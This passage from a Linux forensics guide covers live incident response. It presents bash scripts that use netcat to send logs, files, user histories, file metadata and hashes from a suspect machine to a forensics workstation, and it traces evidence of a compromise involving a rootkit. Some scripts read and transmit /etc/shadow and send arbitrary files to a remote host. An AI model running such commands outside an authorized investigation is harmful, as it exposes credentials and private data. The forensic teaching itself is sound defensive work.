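  [ -z "$DEMO_HOST" ] && { export DEMO_HOST=localhost; }
  echo "$DEMO_HOST"
}

unset DEMO_HOST
set_default_host            # variable was unset, so the default is applied
DEMO_HOST=192.168.56.1
set_default_host            # variable already set, so the export is skipped
```

Bash also offers parameter expansion for the same purpose, for example ${RPORT:-4444}, which expands to 4444 when RPORT is unset or empty. The short circuit form is shown here because it is the one the scripts in this chapter use.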

NOT JUST FOR SCRIPTS

Short circuiting is useful in many places

Short circuiting isn’t just for scripts. It can be useful when you have a series of commands that might take a while to run when each command depends on the success of the command before it. For example, the command sudo apt-get update && sudo apt-get -y upgrade will first update the local software repository cache and then upgrade any packages that have newer versions. The -y option automatically says yes to any prompts. If you are unable to connect to your repositories for some reason the upgrade command is never executed.

Another common use of this technique is building software from source when you do not want to sit around and wait to see if each stage completes successfully. Many packages require a configure script to be run that checks dependencies and optionally sets some non-default options (such as library and tool locations), followed by a make and sudo make install. It can take some time for all three stages to complete. The command ./configure && make && sudo make install can be used to do this all on one line.

The only real work done in this script is in the echo line near the bottom. We have already seen the echo command, but there are a few new things on this line. First, echo has a -e option. The option enables interpretation of backslash escapes. This allows us to put newlines (\n) in our string in order to produce multiple lines of output with a single echo command.

There are a couple of reasons why we want to use a single echo command here. First, we will be passing (piping actually) the results to the netcat talker which will send this data to our forensics workstation. We want this done as one atomic transaction. Second, this allows a more compact and easily understood script.

There is also something new in the echo string, the $@ variable. $@ is equal to the entire set of command line parameters passed to the script. We first use $@ to create a header that reads “++++ Sending log for {command with parameters} at {date} ++++”. We then use our $() trick yet again to actually run the command and insert its output into our string. Finally, a “---end---” footer is added after the command output.
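The way the header, command output, and footer are assembled can be tried locally without a listener. The sketch below is a variation rather than the script itself: wrap_output is a hypothetical name, printf is used in place of echo -e, the date is left out so the result is repeatable, and nothing is piped to netcat.

```shell
# Build the same kind of wrapped message that send-log.sh sends,
# but print it to the terminal instead of piping it to netcat.
wrap_output() {
  # "$*" joins the arguments for the header; $("$@") runs them as a command.
  printf '++++ Sending log for %s ++++\n%s\n---end---\n' "$*" "$("$@")"
}

wrap_output echo hello world
# ++++ Sending log for echo hello world ++++
# hello world
# ---end---
```

Quoting "$@" keeps arguments that contain spaces intact, which the unquoted form in the original script does not guarantee.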

The last client script is used to send files to the forensics workstation for analysis. It will make a log entry, then send the filename to the appropriate port, then delay a few seconds to give the server time to create a listener to receive the file, and finally send the file. The script for doing this follows.

# send-file.sh
#
# Simple script to send a new file
# to listener on forensics workstation. Intended to be
# used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

# defaults primarily for testing
[ -z "$RHOST" ] && { export RHOST=localhost; }
[ -z "$RPORT" ] && { export RPORT=4444; }
[ -z "$RFPORT" ] && { export RFPORT=5555; }
[ -z "$RFTPORT" ] && { export RFTPORT=5556; }

usage () {
  echo "usage: $0 <filename>"
  echo "Simple script to send a file to listener"
  exit 1
}

# did you specify a file?
if [ $# -lt 1 ] ; then
  usage
fi

# log it
echo "Attempting to send file $1 at $(date)" | nc $RHOST $RPORT

# send name
echo $(basename $1) | nc $RHOST $RFPORT

# give it time
sleep 5

nc $RHOST $RFTPORT < $1

As with the other client scripts, there is no she-bang at the beginning of the script so it must be run manually by typing bash ./send-file.sh {filename}. The short circuiting technique is again used to set environment variables to defaults if they have not been set. The script is very straightforward. First, the number of parameters passed in is checked, and if no filename was passed in, the usage statement is displayed. Second, an entry recording the attempt is sent to the log listener. Third, the filename is echoed to the filename listener which causes the server to start a listener to receive the file. Note that the basename command is used to strip any leading path from the filename (the full path does appear in the log, however). Fourth, the script sleeps for five seconds to allow the server time to start the listener. This is probably not needed, but it is well worth waiting a few seconds to have a reliable script. Finally, the file is sent to the file listener and then the script exits.
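The effect of basename is easy to check on its own. In this small sketch the path is a made-up example and strip_path is a hypothetical wrapper; the file does not need to exist because basename only manipulates the string.

```shell
# Return just the final component of a path, as send-file.sh does
# before sending the name to the filename listener.
strip_path() {
  basename "$1"
}

full_path=/var/log/apache2/access.log    # illustrative path only
echo "log entry would mention: $full_path"
echo "filename listener would receive: $(strip_path "$full_path")"
```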

INTRODUCING OUR FIRST SUBJECT SYSTEM

Throughout this book we will work through a few example subject systems. If you wish to follow along, you may download the example images from http://philpolstra.com. This website is also the place to get updates and other materials from this book (and also past and future books). To keep things simple I will install this example system in a virtual machine using VirtualBox running on my Ubuntu 14.04 computer. Recall that I said earlier in this book that using a USB 2.0 response drive is less problematic when trying to mount the drive in a virtual machine.

Our first example is also an Ubuntu 14.04 64-bit system. You have received a call from your new client, a development shop known as Phil’s Futuristic Edutainment (PFE) LLC. Your initial interviews revealed that one of the lead developer’s computers has been acting strangely and PFE suspects the machine has been hacked. They have no in-house Linux forensics people so you were called in. One of the things that seems to be happening on the subject system is that warnings such as those from Figure 2.13 keep popping up.

FIGURE 2.13

Suspicious system warnings on subject system.

One of the first things you need to do with the subject system is mount your known-good binaries. The steps required are shown in Figure 2.14. The ifconfig utility is also run as a verification that everything is working correctly.

FIGURE 2.14

Mounting a response drive and loading a known-good shell and binaries.

A sequence of commands to run the known-good binaries and then use the above client scripts is shown in Figure 2.15. Some of the results that appear on the forensics workstation are shown in Figure 2.16 and Figure 2.17.

FIGURE 2.15

Mounting known-good binaries and then running some client scripts on the subject system.

FIGURE 2.16

Partial log entry for the commands shown in Figure 2.15.

FIGURE 2.17

Files created by the commands in Figure 2.15.

COLLECTING VOLATILE DATA

There is plenty of volatile data that can be collected from the subject system. Collecting this data will help you make a preliminary determination as to whether or not there was an incident. Some of the more common pieces of data you should collect are discussed below.

Date and time information

One of the first things you want to collect is the date and time information. Why? The subject system might be in a different time zone from your usual location. Also, computer clocks are known to be bad at keeping good time. If the system has not been synchronized with a time server recently the clock could be off, and you will want to note this skew to adjust times in your reports. Despite its name, the date command outputs not only the date, but the time and time zone as well.
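Recording the skew is simple arithmetic once both clocks are expressed in seconds since the epoch, which is what date +%s prints. The helper below is a hypothetical sketch, and the two timestamps are made-up values, not readings from the PFE system.

```shell
# clock_skew is a hypothetical helper: it subtracts a trusted reference
# time from the time reported by the subject system. Both values are in
# seconds since the epoch, the format printed by `date +%s`.
clock_skew() {
  subject_epoch=$1
  reference_epoch=$2
  echo $(( subject_epoch - reference_epoch ))
}

# Example values only: the subject clock is 90 seconds ahead.
clock_skew 1426000090 1426000000    # prints: 90
```

A positive result means the subject clock runs ahead of the reference, so that many seconds would be subtracted from subject timestamps when writing the report.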

Operating system version

You will need to know the exact operating system and kernel version the subject system is running should you later decide to do memory analysis. The uname -a command will provide you with this information and also the machine name and kernel build timestamp. The results of running this command on the PFE subject system are shown in Figure 2.18.

FIGURE 2.18

Results of running uname on a subject system.

Network interfaces

What network interfaces are on the machine? Is there anything new that shouldn’t be there? This might sound like a strange question, but an attacker with physical access could add a wireless interface or USB interface pretty easily. Other strange but less common interfaces are a possibility.

What addresses have been assigned to various interfaces? What about the netmask? Has someone taken a network interface down in order to have traffic routed through something they control or monitor? All of these questions are easily answered using the ifconfig -a command. The results of running ifconfig -a on the subject system are shown in Figure 2.19.

FIGURE 2.19

Results from the ifconfig -a command.

Network connections

What other machines are talking with the subject machine? Are there any suspicious local network connections? Is the system connecting to something on the Internet when it is not supposed to have such access? These questions and more can be answered by running the netstat -anp command. The options a, n, and p are used to specify all sockets, use only numeric IPs (do not resolve host names), and display process identifiers and programs, respectively.

Open ports

Are there any suspicious open ports? Is the system connecting to ports on another machine that are known to be used by malware? These questions are also easily answered by running the netstat -anp command. The results of running this command on the subject system are shown in Figure 2.20.

FIGURE 2.20

Results of running netstat -anp on the subject system.

Malware can affect any of the commands you are running during your initial scan of the subject system. This is true even with known-good binaries as underlying memory structures may be altered by rootkits and the like. The results of running netstat -anp on the subject system after a rootkit is installed are shown in Figure 2.21. Note that the netstat process is killed and a system warning is also displayed. Every command that fails like this increases the probability that the machine has been compromised.

FIGURE 2.21

The results of running netstat -anp after a rootkit has been installed.

Programs associated with various ports

Some ports are known to be home to malicious services. Even safe ports can be used by other processes. The output of netstat -anp can be used to detect programs using ports they should not be using. For example, malware could use port 80 as it will look like web traffic to a casual observer.

Open Files

In addition to asking which programs are using what ports, it can be insightful to see which programs are opening certain files. The lsof -V (list open files with Verbose search) command provides this information. The results of running this command on the subject system are shown in Figure 2.22. As with the netstat command, this will fail if certain rootkits are installed.

FIGURE 2.22

Results of running lsof -V on subject system. Note that this command failed when it was rerun after installation of a rootkit (Xing Yi Quan).

Running Processes

Are there any suspicious processes running? Are there things being run by the root user that should not be? Are system accounts that are not allowed to login running shells? These questions and more can be answered by running the ps -ef command. The -e option lists processes for everyone and -f gives a full (long) listing. This is another command that might fail if a rootkit has been installed. Partial results of running this command on the subject system are shown in Figure 2.23.

FIGURE 2.23

Results of running ps -ef on the subject system.

Routing Tables

Is your traffic being rerouted through an interface controlled and/or monitored by an attacker? Have any gateways been changed? These and other questions can be answered by examining the routing table. There is more than one way to obtain this information. Two of these ways are to use the netstat -rn and route commands. I recommend running both commands as a rootkit might alert you to its presence by altering the results of one or both of these commands. If you get conflicting results it is strong evidence of a compromise. The results of running both of these commands on the subject system are shown in Figure 2.24.

FIGURE 2.24

Results of running netstat -rn and route on the subject system.

Mounted filesystems

Are any suspicious volumes mounted on the system? Is one of the filesystems suddenly filling up? What are the permissions and options used to mount each partition? Are there unusual temporary filesystems that will vanish when the system is rebooted? The df (disk free) and mount commands can answer these types of questions.

As with many other commands, a rootkit might alter the results of one or both of these commands. Whenever two utilities disagree it is strong evidence of a compromised system. The results of running df and mount on the subject system are shown in Figure 2.25.

FIGURE 2.25

Results of running df and mount on the subject system.
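Checking whether two utilities agree can be done on the forensics workstation once their output has been saved and reduced to comparable lines. The sketch below rests on several assumptions: outputs_agree is a hypothetical helper, the sample data is invented, and real df and mount output would first need the mount points extracted because the two commands use different layouts.

```shell
# outputs_agree is a hypothetical helper: it sorts two saved listings and
# reports whether they contain exactly the same lines.
outputs_agree() {
  if [ "$(sort "$1")" = "$(sort "$2")" ]; then
    echo "agree"
  else
    echo "DISAGREE"
  fi
}

# Made-up sample data standing in for normalized command output.
workdir=$(mktemp -d)
printf '/\n/boot\n/home\n' > "$workdir/from_mount.txt"
printf '/home\n/\n/boot\n' > "$workdir/from_df.txt"
printf '/\n/boot\n'        > "$workdir/altered.txt"

outputs_agree "$workdir/from_mount.txt" "$workdir/from_df.txt"   # agree
outputs_agree "$workdir/from_mount.txt" "$workdir/altered.txt"   # DISAGREE
```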

Loaded kernel modules

Are there any trojaned kernel modules? Are there any device drivers installed that the client does not know anything about? The lsmod command provides a list of currently loaded kernel modules. Partial results from running lsmod are shown in Figure 2.26.

FIGURE 2.26

Partial results of running lsmod on the subject system.

Users past and present

Who is currently logged in? What command did each user last run? These questions can be answered by the w command. For those who are not familiar, w is similar to the who command, but it provides additional information. Results for the w command are shown in Figure 2.27.

FIGURE 2.27

Results of running the w command on the subject system.

Who has been logging in recently? This question is answered by the last command. A list of failed login attempts can be obtained using the lastb command. The last command lists when users were logged in, if the system crashed or was shut down while a user was logged in, and when the system was booted. Partial results from running last are shown in Figure 2.28. Note that there are multiple suspicious logins on March 9th. A new user johnn who should not exist has logged on, as has the lightdm system account.

FIGURE 2.28

Partial results of running last on the subject system. The logins by johnn and lightdm are indicators of a compromise.

The results from running lastb on the subject system are shown in Figure 2.29. From the figure it can be seen that John struggled to remember his password on May 20th. The much more interesting thing that can be seen is that the lightdm account had a failed login on March 9th. When you combine this information with the results from last, it would appear that an attacker was testing this new account and did not correctly set things up the first time. Furthermore, it seems likely the john account was used by the attacker.

FIGURE 2.29

Are there any new accounts created by an attacker? Has someone modified accounts to allow system accounts to login? Was the system compromised because a user had an insecure password? Examination of the /etc/passwd and /etc/shadow files helps you answer these questions.

A partial listing of the /etc/passwd file can be found in Figure 2.30. Notice the highlighted portion is for the johnn account. It appears as though an attacker created this account and tried to make it look a lot like the john account for John Smith. Also of note is the hidden home directory for johnn located at /home/.johnn.

FIGURE 2.30

Partial listing of /etc/passwd file from subject system. The highlighted line is for a new johnn account which appears at first glance to be the same as john. Note the hidden home directory.

Looking at the line for the lightdm account in Figure 2.30 we observe that the login shell has been set to /bin/false. This is a common technique used to disable login of some system accounts. From the last command results it is clear that this user was able to login. This is cause for investigation of the /bin/false binary.
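Once the passwd file has arrived on the forensics workstation, simple filters can point out entries worth a closer look. The following is a sketch under stated assumptions: flag_accounts is a hypothetical helper, the two checks are merely examples of things one might look for, and the sample lines (including the UID and GID numbers) are invented to resemble the situation described above.

```shell
# flag_accounts is a hypothetical helper that reads passwd-format text on
# standard input. Fields are colon separated: name, password, UID, GID,
# comment, home directory, shell.
flag_accounts() {
  awk -F: '
    $6 ~ "/[.][^/]*$"       { print $1 ": hidden home directory " $6 }
    $3 == 0 && $1 != "root" { print $1 ": UID 0 but not named root" }
  '
}

# Made-up sample lines modeled on the situation described in the text.
printf '%s\n' \
  'root:x:0:0:root:/root:/bin/bash' \
  'john:x:1000:1000:John Smith,,,:/home/john:/bin/bash' \
  'johnn:x:1001:1001:John Smith,,,:/home/.johnn:/bin/bash' | flag_accounts
# prints: johnn: hidden home directory /home/.johnn
```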

Putting it together with scripting

There is no good reason to type all of the commands mentioned above by hand. Since you already are mounting a drive with your known-good binaries, it makes sense to have a script on your response drive to do all the work for you. A simple script for your initial scan follows. The script is straightforward and primarily consists of calling the send-log.sh script presented earlier in this chapter.

# initial-scan.sh
#
# Simple script to collect basic information as part of
# initial live incident response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
  echo "usage: $0 [listening host]"
  echo "Simple script to send a log entry to listener"
  exit 1
}

# too many arguments or a request for help?
if [ $# -gt 1 ] || [ "$1" == "--help" ] ; then
  usage
fi

# did you specify a listener IP?
if [ "$1" != "" ] ; then
  source setup-client.sh $1
fi

# now collect some info!
send-log.sh date
send-log.sh uname -a
send-log.sh ifconfig -a
send-log.sh netstat -anp
send-log.sh lsof -V
send-log.sh ps -ef
send-log.sh netstat -rn
send-log.sh route
send-log.sh lsmod
send-log.sh df
send-log.sh mount
send-log.sh w
send-log.sh last
send-log.sh lastb
send-log.sh cat /etc/passwd
send-log.sh cat /etc/shadow

SUMMARY

We have covered quite a bit in this chapter. Ways of minimizing disturbance to a subject system while determining if there was an incident were discussed. Several scripts to make this easy were presented. We ended this chapter with a set of scripts that can allow you to determine if there was a compromise in mere minutes. In the next chapter we will discuss performing a full live analysis once you have determined that an incident occurred.

CHAPTER 3

Live Analysis

INFORMATION IN THIS CHAPTER:

File metadata
Timelines
User command history
Log file analysis
Hashing
Dumping RAM
Automation with scripting

THERE WAS AN INCIDENT: NOW WHAT?

Based on interviews with the client and limited live response you are convinced there has been an incident. Now what? Now it is time to delve deeper into the subject system before deciding if it must be shut down for dead analysis. The investigation has now moved into the next box as shown in Figure 3.1.

FIGURE 3.1

The High-level Investigation Process.

Some systems can be shut down with minimal business disruption. In our example case the subject system is a developer workstation which is normally not terribly painful to take offline. The only person affected by this is the developer. His or her productivity has already been affected by malware we have discovered. In a case like this you might decide to dump the RAM and proceed to dead analysis. If this is what you have chosen to do, you can safely skip ahead to the section of this chapter on dumping RAM.

GETTING FILE METADATA

At this point in the investigation you should have a rough idea of approximately when an incident may have occurred. It is not unusual to start with some system directories and then go back to examine other areas based on what you find. It is the nature of investigations that you will find little bits of evidence that lead you to other little bits of evidence and so on.

A good place to start the live analysis is to collect file metadata which includes timestamps, permissions, file owners, and file sizes. Keep in mind that a sophisticated attacker might alter this information. In the dead analysis section of this book we will discuss ways of detecting this and how to recover some metadata that is not easily altered without specialized tools.

As always, we will leverage scripting to make this task easier and minimize the chances for mistakes. The following script builds on shell scripts from Chapter 2 in order to send file metadata to the forensics workstation. The data is sent in semicolon delimited format to make it easier to import into a spreadsheet for analysis.

# send-fileinfo.sh
#
# Simple script to collect file information as part of
# initial live incident response.
# Warning: This script might take a long time to run!
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
  echo "usage: $0 <starting directory>"
  echo "Simple script to send file information to a log listener"
  exit 1
}

if [ $# -lt 1 ] ; then
  usage
fi

# semicolon delimited file which makes import to spreadsheet easier
# printf is access date, access time, modify date, modify time,
# create date, create time, permissions, user id, user name,
# group id, group name, file size, filename and then line feed
# note: the %C codes report the inode status change time (ctime),
# which is used here as the create time
# if you want nice column labels in your spreadsheet, paste the following
# line (minus #) at start of your CSV file
# Access Date;Access Time;Modify Date;Modify Time;Create Date;Create Time;Permissions;UID;Username;GID;Groupname;Size;File
send-log.sh find $1 -printf "%Ax;%AT;%Tx;%TT;%Cx;%CT;%m;%U;%u;%G;%g;%s;%p\n"

The script takes a starting directory because you probably want to limit the scope of this command as it takes a while to run. All of the real work in this script is in the very last line. Many readers have likely used the find utility in its simplest form which prints out the names of found files. The find command is capable of so much more as we will see later in this chapter. Here the -printf option has been used which allows found file attributes to be printed in a specified format. Consult the find man page (accessible by typing man find in a terminal) for the complete list of format codes if you want to customize this script.
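A cut-down format string makes the -printf option easier to experiment with. This sketch assumes GNU find, creates its own scratch directory, and uses only three format codes; list_meta and the sample file are hypothetical.

```shell
# Scratch directory and file created just for this demonstration.
demo_dir=$(mktemp -d)
printf 'hello' > "$demo_dir/sample.txt"
chmod 640 "$demo_dir/sample.txt"

# %m = permissions in octal, %s = size in bytes, %f = name without the path
list_meta() {
  find "$1" -type f -printf "%m;%s;%f\n"
}

list_meta "$demo_dir"    # prints: 640;5;sample.txt
```

Adding or removing codes from the format string is all it takes to change which columns end up in the spreadsheet.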

A portion of what is received by the forensics workstation when this script is run on the subject system is shown in Figure 3.2. The highlighted line is for /bin/false. According to this information it was modified on March 9th, the date of the suspected compromise. Looking five lines above this entry reveals that false is exactly the same size as bash which makes no sense for a program that only exists to return a value. The false program is four times the size of the true program which also exists only to return a value.

FIGURE 3.2

Partial results from running send-fileinfo.sh on /bin directory. The highlighted line indicates that /bin/false was modified about the time of the compromise. Also suspicious is the fact that the file size matches that of /bin/bash five lines above it.

USING A SPREADSHEET PROGRAM TO BUILD A TIMELINE

Should you decide to perform a full dead analysis a complete timeline can be built using techniques described later in this book. At this stage of the investigation having a file list that can be sorted by modification, creation, and access times based on output from the script in the previous section can be helpful. While not as nice as a proper timeline that intertwines these timestamps, it can be created in a matter of minutes.

The first step is to open the log.txt file for the case in your favorite text editor on the forensics workstation. If you would like headers on your columns (recommended) then also cut and paste the comment from the send-fileinfo.sh script, minus the leading #, as indicated. Save the file with a .csv extension and then open it in LibreOffice Calc (or your favorite spreadsheet program). You will be greeted with a screen such as that shown in Figure 3.3. Click on each column and set its type as shown in the figure. Failure to do this will cause dates and times to be sorted alphabetically which is not what you want.

FIGURE 3.3

Importing a CSV file with file metadata into LibreOffice Calc. Note that each column type should be set to allow for proper sorting.

Once the file has been imported it is easily sorted by selecting all of the pertinent rows and then choosing sort from the data menu. The columns are most easily selected by clicking and dragging across the column letters (which should be A-M) at the top of the spreadsheet. The appropriate sort commands to sort by descending access time are shown in Figure 3.4.

FIGURE 3.4

Sorting file metadata by access time.

A similar technique can be used to sort by modification or creation time. It might be desirable to copy and paste this spreadsheet onto multiple tabs (technically worksheets) and save the resulting workbook as a regular Calc file. The easiest way to copy information to a new sheet is to click in the blank square in the upper left corner (above the 1 and to the left of the A), press Control-C, go to the new sheet, click in the same upper left hand square, and then press Control-V.

The creation time tab of such a spreadsheet for our subject system is shown in Figure 3.5. The highlighted rows show that the suspicious /bin/false file was created around the time of our compromise and that the Xing Yi Quan rootkit has been installed. Note that some of the rootkit files have access timestamps around the time of the compromise, yet they have been created and modified later, at least according to the possibly altered metadata.

FIGURE 3.5

File metadata for the /bin directory sorted by creation timestamps. The highlighted rows show that /bin/false was altered about the time of our compromise and that the Xing Yi Quan rootkit appears to be installed.

EXAMINING USER COMMAND HISTORY

The bash (Bourne Again Shell) shell is the most popular option among Linux users. It is frequently the default shell. Bash stores users’ command histories in the hidden .bash_history file in their home directories. The following script uses the find utility to search for these history files in home directories, including the root user’s home directory of /root. A sophisticated attacker will delete these files and/or set their maximum size to zero. Fortunately for the investigator, not all attackers know to do this.

# send-history.sh
#
# Simple script to send all user bash history files as part of
# initial live incident response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
  echo "usage: $0 "
  echo "Simple script to send user history files to a log listener"
  exit 1
}

if [ $# -gt 0 ] ; then
  usage
fi

# find only files, filename is .bash_history
# execute echo, cat, and echo for all files found
send-log.sh find /home -type f -regextype posix-extended -regex \
  '/home/[a-zA-Z.]+/\.bash_history' \
  -exec echo -e "--dumping history file {} --\n" \; \
  -exec cat {} \; -exec echo -e "--end of dump for history file {} --\n" \;

# repeat for the admin user
send-log.sh find /root -type f -maxdepth 1 -regextype posix-extended \
  -regex '/root/\.bash_history' \
  -exec echo -e "--dumping history file {} --\n" \; \
  -exec cat {} \; -exec echo -e "--end of dump for history file {} --\n" \;

This code requires a little explanation. The easiest new thing to explain is the \ characters at the end of some lines. These are line continuation characters. This allows the script to be more readable, especially when printed in this book. This same line continuation character can be used in other scripting languages such as Python, although it is not necessarily the preferred method for those languages.

Now that we have described the \ characters, let’s tackle some of the harder parts of this script. We’ll break down the find command piece by piece. Find has the ability to search by file type. The command find /home -type f instructs find to search under /home for regular files (not directories, devices, etc.).

In addition to finding files by name, find allows regular expressions to be used for the filename. Note that the expression is matched against the whole path of each file, not just the last component. If you are not familiar with regular expressions, they are powerful ways of defining patterns. A complete tutorial on regular expressions, also called regexes, is well beyond the scope of this book. There are a number of online resources, such as http://www.regular-expressions.info/, for those wanting to know more. The book Mastering Regular Expressions by Jeffrey E. F. Friedl (O’Reilly, 2006) is a great resource for those that prefer a book.

In regular expressions we have characters that match themselves (literals) and those with special meaning (metacharacters). Within the set of metacharacters we have things that match, anchors, and quantity specifiers. Occasionally we want to treat metacharacters as literals and we do this by escaping them. Escaping a character is as simple as prepending the \ character before it.

Some of the more common matching metacharacters are character classes (lists of characters inside square brackets) and the period, which match any character in the list and any character except a newline, respectively. Because the period is a metacharacter, it must be escaped when you want to match a period, as is the case with the regular expression in this script.

Some of the most used quantity specifiers include *, +, and ? which indicate zero or more, one or more, and zero or one, respectively. Quantity specifiers apply to the thing (literal character, metacharacter, or grouping) just before them. For example, the regular expression A+ means one or more capital A’s. As another example, [A-Z]?[a-z]+ would match any word that is written in all lowercase letters with the possible exception of the first letter (breaking it down it is zero or one uppercase letters followed by one or more lowercase letters).
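The [A-Z]?[a-z]+ example can be tried with grep, which accepts the same extended regular expression syntax when given -E. This is a minimal sketch; matches_word is a hypothetical helper, and LC_ALL=C is set as a precaution so that the letter ranges are interpreted as plain ASCII.

```shell
# matches_word is a hypothetical helper. grep -E selects extended regular
# expressions, -x requires the whole line to match, and -q suppresses output.
matches_word() {
  if printf '%s\n' "$1" | LC_ALL=C grep -Eqx '[A-Z]?[a-z]+'; then
    echo "match"
  else
    echo "no match"
  fi
}

matches_word Linux       # match: one capital, then lowercase letters
matches_word forensics   # match: zero capitals is allowed by ?
matches_word RAM         # no match: capitals after the first letter
```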

It is easy to understand the regular expression in our script if we break it down into three parts. The first part “/home/” is a literal string that matches the main directory where users’ home directories are stored. The second part “[a-zA-Z.]+” matches one or more lowercase letters or uppercase letters or a period. This should match most usernames, although names containing digits, hyphens, or underscores would be missed. The final portion is another literal string, but this time with a period escaped. In other words, the regular expression “/\.bash_history” matches the literal string “/.bash_history”.

The remainder of the find command runs three commands for each file found using the -exec option. Anywhere you see “{}” the find command will replace it with the name of the file found. Once you know that, it is easy to understand how this works. First we echo a header that includes the filename. Then we cat (type) the file with the second -exec. Finally, a footer is added to the output. After all of the regular user home directories have been scanned, a slightly modified find command is run to print out the root user’s bash history if it exists.

A portion of the john user’s bash history is shown in Figure 3.6. It would appear that the attacker tried to use sed (stream editor) to modify the /etc/passwd file. It seems that he or she had some trouble as they also looked at the man page for sed and ultimately just used vi. A few lines down in this history file we see the Xing Yi Quan rootkit being installed and the ls command being used to verify that the directory into which it was downloaded is hidden.

FIGURE 3.6

Part of john user’s bash history. The lines near the top indicate an attempt to modify the new johnn account information. Further down we see commands associated with the installation of a rootkit.

GETTING LOG FILES

Unlike Windows, Linux still uses plain text log files in many cases. These logs can usually be found in the /var/log directory. Some are found in this directory while others are located in subdirectories. Most logs will have a .log extension or no extension. It is common practice to save several older versions of certain logs. These archived logs have the same base filename, but .n, where n is a positive number, added. Some of the older logs are also compressed with gzip giving them a .gz extension as well. For example, if the log file is named “my.log” the most recent archive might be “my.log.1” and older archives named “my.log.2.gz”, “my.log.3.gz”, etc.

The script below will use the find utility to retrieve current log files from the subject system and send them to the forensics workstation. If after examining the current logs you determine they don’t cover a relevant time period for your investigation (which usually means they should have called you much earlier) you can easily use the send-file.sh script presented earlier to send whatever additional logs you deem necessary. Of course, if you have made the decision to perform a dead analysis you are likely better off just waiting to look at these later as the tools available for dead analysis make this much easier.

# send-logfiles.sh
#
# Simple script to send all logs as part of
# initial live incident response.
# Warning: This script might take a long time to run!
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
  echo "usage: $0 "
  echo "Simple script to send log files to a log listener"
  exit 1
}

if [ $# -gt 0 ] ; then
  usage
fi

# find only files, exclude files with numbers as they are old logs
# execute echo, cat, and echo for all files found
send-log.sh find /var/log -type f -regextype posix-extended \
  -regex '/var/log/[a-zA-Z.]+(/[a-zA-Z.]+)*' \
  -exec echo -e "--dumping logfile {} --\n" \; \
  -exec cat {} \; -exec echo -e "--end of dump for logfile {} --\n" \;

This script uses the same elements as the previous bash history grabbing script with one exception. There is something new in the regular expression. Parentheses have been used to group things together in order to apply the * quantifier (zero or more). If we break the regular expression into three parts it is easier to understand.

The first part “/var/log/” matches the literal string that is the normal directory where log files can be found. The second chunk “[a-zA-Z.]+” matches one or more letters or a period. This will match any current log files or directories while excluding archived logs (because numbers are not included in the square brackets). The final portion “(/[a-zA-Z.]+)*” is the same as the second chunk preceded by a slash, but it is enclosed in parentheses and followed by *. This grouping causes the * quantifier (zero or more) to be applied to everything in the parentheses. The zero case matches logs that are in /var/log, the one case matches logs one level down in a subdirectory, etc.
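Which paths the expression accepts can be checked without running find at all. The sketch below feeds sample paths to grep -E with -x, which requires the whole line to match much as find -regex requires the whole path to match. The helper name is_current_log and the sample paths are illustrative assumptions.

```shell
# is_current_log is a hypothetical helper that tests a path against the
# extended regular expression used in send-logfiles.sh.
is_current_log() {
  if printf '%s\n' "$1" | LC_ALL=C grep -Eqx '/var/log/[a-zA-Z.]+(/[a-zA-Z.]+)*'; then
    echo "current"
  else
    echo "skipped"
  fi
}

is_current_log /var/log/syslog            # current
is_current_log /var/log/apt/history.log   # current
is_current_log /var/log/syslog.1          # skipped (archived)
is_current_log /var/log/syslog.2.gz       # skipped (archived)
```

One side effect worth keeping in mind is that any current log whose path contains a digit, hyphen, or underscore is skipped as well, so a directory such as /var/log/apache2 would need to be collected separately with send-file.sh.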

Part of the log files for our subject system are shown in Figure 3.7. In the upper part of the figure you can see the tail of the dmesg (device message) log. Notice that this log doesn’t use timestamps. Rather, it uses seconds since boot. The start of the syslog (system log) is shown in the lower portion of the figure. It can be seen that syslog does use timestamps. There are other logs that provide no time information whatsoever. Similar to bash history, such logs only provide the order in which things were done.

FIGURE 3.7

Part of the log files dump from the subject system. Notice that some logs contain timestamps while others contain seconds since boot or no time information at all.

COLLECTING FILE HASHES

There are a number of hash databases on the Internet that contain hashes for known-good and known-bad files. Is this the best way of finding malware? Absolutely not! That said, checking hashes is super quick compared to analyzing files with anti-virus software or attempting to reverse engineer them. A good hash database allows you to eliminate a large number of files from consideration. Occasionally you might find malware using hashes. Reducing the number of files you are forced to look at by eliminating known-good files from your analysis is much more useful, however.

Two popular free hash databases include https://www.owasp.org/index.php/OWASP_File_Hash_Repository by the Open Web Application Security Project (OWASP), and http://www.nsrl.nist.gov/ from the National Institute of Standards and Technology. As of this writing they both support MD5 and SHA-1. Should they support more modern algorithms in the future the script below is easily modified.

# send-sha1sum.sh
#
# Simple script to calculate sha1 sum as part of
# initial live incident response.
# Warning: This script might take a long time to run!
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
  echo "usage: $0 <starting directory>"
  echo "Simple script to send SHA1 hash to a log listener"
  exit 1
}

if [ $# -lt 1 ] ; then
  usage
fi

# find only files, don't descend to other filesystems,
# execute command sha1sum -b <filename> for all files found
send-log.sh find $1 -xdev -type f -exec sha1sum -b {} \;

Once again we are using find in this script. A new option, -xdev, has appeared. This option tells find not to descend into directories on other filesystems. The command sha1sum -b {filename} will compute the SHA1 hash for filename while treating it as a binary file.

Partial results from running this script against the /bin directory on the subject machine are shown in Figure 3.8. The highlighted lines show that /bin/bash and /bin/false have the same hash value. It would appear that the attacker overwrote /bin/false with /bin/bash. This is likely how system accounts such as lightdm were able to login despite the administrator’s attempts to disable login by setting the shell equal to /bin/false.

FIGURE 3.8

Some results from running send-sha1sum.sh against the /bin directory of the subject system. The files /bin/bash and /bin/false have the same hash value which indicates the attacker overwrote /bin/false with /bin/bash.
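Spotting two files with the same hash by eye only works for short listings. As a rough sketch (the helper name find_duplicate_hashes is hypothetical, and the -w and --all-repeated options assume GNU uniq), the hash list can be sorted and grouped so that files sharing a SHA1 value are printed together:

```shell
#!/bin/sh
# Hypothetical helper: print groups of files under a directory that share
# a SHA1 hash. A SHA1 hash is 40 hex characters, so uniq compares only the
# first 40 characters of each "hash *filename" line (GNU uniq options).
find_duplicate_hashes() {
    find "$1" -xdev -type f -exec sha1sum -b {} \; |
        sort |
        uniq -w 40 --all-repeated=separate
}

# Example (assumed invocation; use known-good binaries on a live subject):
#   find_duplicate_hashes /bin
```

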